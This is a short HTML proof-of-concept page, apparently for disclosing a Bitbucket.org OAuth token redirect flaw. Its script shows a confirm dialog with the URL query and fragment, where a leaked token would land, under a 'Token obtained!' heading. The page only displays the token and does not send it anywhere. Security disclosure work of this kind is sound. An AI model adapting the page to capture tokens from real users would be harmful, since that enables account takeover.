<!DOCTYPE html>
<html>
  <head> 
    <meta charset="utf-8">
    <meta name="generator" content="GitLab Pages">
    <title>Bitbucket.org Token Redirect PoC</title>
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <h1>Token obtained!</h1>
    <script>confirm("Token: " + location.search + " " + location.hash)</script>
  </body>
</html>